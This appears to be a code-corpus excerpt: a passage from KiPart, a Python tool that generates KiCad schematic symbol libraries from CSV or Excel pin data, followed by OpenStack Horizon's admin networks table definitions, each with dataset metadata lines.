rotating the side of pins. transform[side] = Affine.rotation(ROTATION[side]) # Now rotate the anchor point to see where it goes. rot_anchor_pt = transform[side] * anchor_pt[side] # Translate the rotated anchor point to coincide with the AL anchor point. translate_x = anchor_pt["left"][X] - rot_anchor_pt[X] translate_y = anchor_pt["left"][Y] - rot_anchor_pt[Y] # Make additional translation to bring the AL point to the correct position. if side == "right": # Translate AL to AR. 
translate_x += box_width translate_y -= box_height elif side == "bottom": # Translate AL to AB translate_y -= box_height elif side == "top": # Translate AL to AT translate_x += box_width # Create the complete transformation matrix = rotation followed by translation. transform[side] = ( Affine.translation(translate_x, translate_y) * transform[side] ) # Also translate the point on each side that defines the box around the symbol. box_pt[side] = transform[side] * box_pt[side] # Draw the transformed pins for each side of the symbol. for side, side_pins in list(unit.items()): # If the pins are ordered by their row in the spreadsheet or by their name, # then reverse their order on the right and top sides so they go from top-to-bottom # on the right side and left-to-right on the top side instead of the opposite # as happens with counter-clockwise pin-number ordering. side_reverse = reverse if sort_type in ["name", "row"] and side in ["right", "top"]: side_reverse = not reverse # Sort the pins for the desired order: row-wise, numeric (pin #), alphabetical (pin name). sorted_side_pins = sorted( list(side_pins.items()), key=pin_key_func, reverse=side_reverse ) # Draw the transformed pins for this side of the symbol. part_defn += draw_pins( unit_num, sorted_side_pins, bbox[side], transform[side], side, push, fuzzy_match ) # Create the box around the unit's pins. part_defn += BOX.format( x0=int(box_pt["left"][X]), y0=int(box_pt["top"][Y]), x1=int(box_pt["right"][X]), y1=int(box_pt["bottom"][Y]), unit_num=unit_num, line_width=box_line_width, fill=BOX_FILLS[fill], ) # Close the section that holds the part's units. part_defn += END_DRAW # Close the part definition. part_defn += END_DEF # Return complete part symbol definition. return part_defn def is_pwr(pin, fuzzy_match): """Return true if this is a power input pin.""" return ( find_closest_match(name=pin.type, name_dict=PIN_TYPES, fuzzy_match=fuzzy_match) == "W" ) def do_bundling(pin_data, bundle, fuzzy_match): """Handle bundling for power pins. Unbundle everything else.""" for unit in list(pin_data.values()): for side in list(unit.values()): for name, pins in list(side.items()): if len(pins) > 1: for index, p in enumerate(pins): if is_pwr(p, fuzzy_match) and bundle: side[p.name + "_pwr"].append(p) else: side[p.name + "_" + str(index)].append(p) del side[name] def scan_for_readers(): """Look for scripts for reading part description files.""" trailer = "_reader.py" # Reader file names always end with this. readers = {} for dir in [os.path.dirname(os.path.abspath(__file__)), "."]: for f in os.listdir(dir): if f.endswith(trailer): reader_name = f.replace(trailer, "") readers[reader_name] = dir return readers def kipart( part_reader, part_data_file, part_data_file_name, part_data_file_type, parts_lib, fill, box_line_width, push, allow_overwrite=False, sort_type="name", reverse=False, fuzzy_match=False, bundle=False, debug_level=0, ): """Read part pin data from a CSV/text/Excel file and write or append it to a library file.""" # Get the part number and pin data from the CSV file. for ( part_num, part_ref_prefix, part_footprint, part_manf_num, part_datasheet, part_desc, pin_data, ) in part_reader(part_data_file, part_data_file_name, part_data_file_type): # Handle retaining/overwriting parts that are already in the library. 
if parts_lib.get(part_num): if allow_overwrite: print("Overwriting part {}!".format(part_num)) else: print("Retaining previous definition of part {}.".format(part_num)) continue do_bundling(pin_data, bundle, fuzzy_match) # Draw the schematic symbol into the library. parts_lib[part_num] = draw_symbol( part_num=part_num, part_ref_prefix=part_ref_prefix, part_footprint=part_footprint, part_manf_num=part_manf_num, part_datasheet=part_datasheet, part_desc=part_desc, pin_data=pin_data, sort_type=sort_type, reverse=reverse, fuzzy_match=fuzzy_match, fill=fill, box_line_width=box_line_width, push=push, ) def read_lib_file(lib_file): parts_lib = OrderedDict() with open(lib_file, "r") as lib: part_def = "" for line in lib: start = re.match("DEF (?P<part_name>\S+)", line) end = re.match("ENDDEF$", line) if start: part_def = line part_name = start.group("part_name") elif end: part_def += line parts_lib[part_name] = part_def else: part_def += line return parts_lib def write_lib_file(parts_lib, lib_file): print("Writing", lib_file, len(parts_lib)) LIB_HEADER = "EESchema-LIBRARY Version 2.3\n" with open(lib_file, "w") as lib_fp: lib_fp.write(LIB_HEADER) for part_def in parts_lib.values(): lib_fp.write(part_def) def call_kipart(args, part_reader, part_data_file, file_name, file_type, parts_lib): """Helper routine for calling kipart from main().""" return kipart( part_reader=part_reader, part_data_file=part_data_file, part_data_file_name=file_name, part_data_file_type=file_type, parts_lib=parts_lib, fill=args.fill, box_line_width=args.box_line_width, push=args.push, allow_overwrite=args.overwrite, sort_type=args.sort, reverse=args.reverse, fuzzy_match=args.fuzzy_match, bundle=args.bundle, debug_level=args.debug, ) def main(): # Get Python routines for reading part description/CSV files. readers = scan_for_readers() parser = ap.ArgumentParser( description="Generate single & multi-unit schematic symbols for KiCad from a CSV file." ) parser.add_argument( "-v", "--version", action="version", version="KiPart " + __version__ ) parser.add_argument( "input_files", nargs="+", type=str, metavar="file.[csv|txt|xlsx|zip]", help="Files for parts in CSV/text/Excel format or as such files in .zip archives.", ) parser.add_argument( "-r", "--reader", nargs="?", type=lambda s: unicode(s).lower(), choices=readers.keys(), default="generic", help="Name of function for reading the CSV or part description files.", ) parser.add_argument( "-s", "--sort", nargs="?", # type=str.lower, type=lambda s: unicode(s).lower(), choices=["row", "num", "name"], default="row", help="Sort the part pins by their entry order in the CSV file, their pin number, or their pin name.", ) parser.add_argument( "--reverse", action="store_true", help="Sort pins in reverse order." ) parser.add_argument( "--side", nargs="?", # type=str.lower, type=lambda s: unicode(s).lower(), choices=["left", "right", "top", "bottom"], default="left", help="Which side to place the pins by default.", ) parser.add_argument( "--fill", nargs="?", type=lambda s: unicode(s).lower(), choices=BOX_FILLS.keys(), default=DEFAULT_BOX_FILL, help="Select fill style for schematic symbol boxes.", ) parser.add_argument( "--box_line_width", type=int, default=DEFAULT_BOX_LINE_WIDTH, help="Set line width of the schematic symbol box.", ) parser.add_argument( "--push", type=float, default=0.5, help="Push pins left/up (0.0), center (0.5), or right/down(1.0) on the sides of the schematic symbol box." 
) parser.add_argument( "-o", "--output", nargs="?", type=str, metavar="file.lib", help="Generated KiCad symbol library for parts.", ) parser.add_argument( "-f", "--fuzzy_match", action="store_true", help="Use approximate string matching when looking-up the pin type, style and orientation.", ) parser.add_argument( "-b", "--bundle", action="store_true", help="Bundle multiple, identically-named power and ground pins each into a single schematic pin.", ) parser.add_argument( "-a", "--append", "--add", action="store_true", help="Add parts to an existing part library. Overwrite existing parts only if used in conjunction with -w.", ) parser.add_argument( "-w", "--overwrite", action="store_true", help="Allow overwriting of an existing part library.", ) parser.add_argument( "-d", "--debug", nargs="?", type=int, default=0, metavar="LEVEL", help="Print debugging info. (Larger LEVEL means more info.)", ) args = parser.parse_args() # kipart f1.csv f2.csv # Create f1.lib, f2.lib # kipart f1.csv f2.csv -w # Overwrite f1.lib, f2.lib # kipart f1.csv f2.csv -a # Append to f1.lib, f2.lib # kipart f1.csv f2.csv -o f.lib # Create f.lib # kipart f1.csv f2.csv -w -o f.lib # Overwrite f.lib # kipart f1.csv f2.csv -a -o f.lib # Append to f.lib # Load the function for reading the part description file. part_reader_name = args.reader + "_reader" # Name of the reader module. reader_dir = readers[args.reader] sys.path.append(reader_dir) # Import from dir where the reader is if reader_dir == ".": importlib.import_module(part_reader_name) # Import module. reader_module = sys.modules[part_reader_name] # Get imported module. else: importlib.import_module("kipart." + part_reader_name) # Import module. reader_module = sys.modules[ "kipart." + part_reader_name ] # Get imported module. part_reader = getattr(reader_module, part_reader_name) # Get reader function. DEFAULT_PIN.side = args.side check_file_exists = True # Used to check for existence of a single output lib file. for input_file in args.input_files: # No explicit output lib file, so each individual input file will generate its own .lib file. if check_file_exists or not args.output: output_file = args.output or os.path.splitext(input_file)[0] + ".lib" if os.path.isfile(output_file): # The output lib file already exists. if args.overwrite: # Overwriting an existing file, so ignore the existing parts. parts_lib = OrderedDict() elif args.append: # Appending to an existing file, so read in existing parts. parts_lib = read_lib_file(output_file) else: print( "Output file {} already exists! Use the --overwrite option to replace it or the --append option to append to it.".format( output_file ) ) sys.exit(1) else: # Lib file doesn't exist, so create a new lib file starting with no parts. parts_lib = OrderedDict() # Don't setup the output lib file again if -o option was used to specify a single output lib. check_file_exists = not args.output file_ext = os.path.splitext(input_file)[-1].lower() # Get input file extension. if file_ext == ".zip": # Process the individual files inside a ZIP archive. with zipfile.ZipFile(input_file, "r") as zip_file: for zipped_file in zip_file.infolist(): zip_file_ext = os.path.splitext(zipped_file.filename)[-1] if zip_file_ext in [".csv", ".txt"]: # Only process CSV, TXT, Excel files in the archive. 
with zip_file.open(zipped_file, "r") as part_data_file: part_data_file = io.TextIOWrapper(part_data_file) call_kipart( args, part_reader, part_data_file, zipped_file.filename, zip_file_ext, parts_lib, ) elif zip_file_ext in [".xlsx"]: xlsx_data = zip_file.read(zipped_file) part_data_file = io.BytesIO(xlsx_data) call_kipart( args, part_reader, part_data_file, zipped_file.filename, zip_file_ext, parts_lib, ) else: # Skip unrecognized files. continue elif file_ext in [".csv", ".txt"]: # Process CSV and TXT files. with open(input_file, "r") as part_data_file: call_kipart( args, part_reader, part_data_file, input_file, file_ext, parts_lib ) elif file_ext in [".xlsx"]: # Process Excel files. with open(input_file, "rb") as part_data_file: call_kipart( args, part_reader, part_data_file, input_file, file_ext, parts_lib ) else: # Skip unrecognized files. continue if not args.output: # No global output lib file, so output a lib file for each input file. write_lib_file(parts_lib, output_file) if args.output: # Only a single lib output file was given, so write library to it after all # the input files were processed. write_lib_file(parts_lib, output_file) # main entrypoint. if __name__ == "__main__": main()
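# ---------------------------------------------------------------------------
# Editor's note -- an illustrative sketch, not part of the original file.
# Besides the CLI above, the library I/O helpers can be used directly for a
# simple read/re-emit round trip (the file names here are hypothetical):
#
#     parts = read_lib_file("existing.lib")  # OrderedDict: part name -> DEF block
#     write_lib_file(parts, "copy.lib")      # writes header plus all DEF blocks
# ---------------------------------------------------------------------------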
mit
7,613,360,735,598,875,000
34.217006
145
0.558249
false
3.551268
false
false
false
yeming233/horizon
openstack_dashboard/dashboards/admin/networks/tables.py
1
5042
# Copyright 2012 NEC Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging from django.core.urlresolvers import reverse from django.template import defaultfilters as filters from django.utils.translation import pgettext_lazy from django.utils.translation import ugettext_lazy as _ from django.utils.translation import ungettext_lazy from horizon import exceptions from horizon import tables from openstack_dashboard import api from openstack_dashboard.dashboards.project.networks \ import tables as project_tables from openstack_dashboard import policy LOG = logging.getLogger(__name__) class DeleteNetwork(policy.PolicyTargetMixin, tables.DeleteAction): @staticmethod def action_present(count): return ungettext_lazy( u"Delete Network", u"Delete Networks", count ) @staticmethod def action_past(count): return ungettext_lazy( u"Deleted Network", u"Deleted Networks", count ) policy_rules = (("network", "delete_network"),) def delete(self, request, obj_id): try: api.neutron.network_delete(request, obj_id) except Exception as e: LOG.info('Failed to delete network %(id)s: %(exc)s', {'id': obj_id, 'exc': e}) msg = _('Failed to delete network %s') % obj_id redirect = reverse('horizon:admin:networks:index') exceptions.handle(request, msg, redirect=redirect) class CreateNetwork(tables.LinkAction): name = "create" verbose_name = _("Create Network") url = "horizon:admin:networks:create" classes = ("ajax-modal",) icon = "plus" policy_rules = (("network", "create_network"),) class EditNetwork(policy.PolicyTargetMixin, tables.LinkAction): name = "update" verbose_name = _("Edit Network") url = "horizon:admin:networks:update" classes = ("ajax-modal",) icon = "pencil" policy_rules = (("network", "update_network"),) DISPLAY_CHOICES = ( ("up", pgettext_lazy("Admin state of a Network", u"UP")), ("down", pgettext_lazy("Admin state of a Network", u"DOWN")), ) class AdminNetworksFilterAction(project_tables.ProjectNetworksFilterAction): name = "filter_admin_networks" filter_choices = (('project', _("Project ="), True),) +\ project_tables.ProjectNetworksFilterAction.filter_choices class NetworksTable(tables.DataTable): tenant = tables.Column("tenant_name", verbose_name=_("Project")) name = tables.WrappingColumn("name_or_id", verbose_name=_("Network Name"), link='horizon:admin:networks:detail') subnets = tables.Column(project_tables.get_subnets, verbose_name=_("Subnets Associated"),) num_agents = tables.Column("num_agents", verbose_name=_("DHCP Agents")) shared = tables.Column("shared", verbose_name=_("Shared"), filters=(filters.yesno, filters.capfirst)) external = tables.Column("router:external", verbose_name=_("External"), filters=(filters.yesno, filters.capfirst)) status = tables.Column( "status", verbose_name=_("Status"), display_choices=project_tables.STATUS_DISPLAY_CHOICES) admin_state = tables.Column("admin_state", verbose_name=_("Admin State"), display_choices=DISPLAY_CHOICES) def get_object_display(self, network): return network.name_or_id class Meta(object): name = "networks" verbose_name = _("Networks") 
table_actions = (CreateNetwork, DeleteNetwork, AdminNetworksFilterAction) row_actions = (EditNetwork, DeleteNetwork) def __init__(self, request, data=None, needs_form_wrapper=None, **kwargs): super(NetworksTable, self).__init__( request, data=data, needs_form_wrapper=needs_form_wrapper, **kwargs) try: if not api.neutron.is_extension_supported(request, 'dhcp_agent_scheduler'): del self.columns['num_agents'] except Exception: msg = _("Unable to check if DHCP agent scheduler " "extension is supported") exceptions.handle(self.request, msg) del self.columns['num_agents']
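# ---------------------------------------------------------------------------
# Editor's note -- an illustrative sketch, not part of the original module.
# Deleting a column at construction time, as done above for 'num_agents', is
# one common way to adapt a horizon DataTable to optional Neutron extensions.
# A hypothetical variant for another extension would follow the same shape:
#
#     if not api.neutron.is_extension_supported(request, 'some-extension'):
#         del self.columns['some_column']
# ---------------------------------------------------------------------------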
apache-2.0
-2,542,113,935,013,305,300
35.80292
78
0.62138
false
4.411199
false
false
false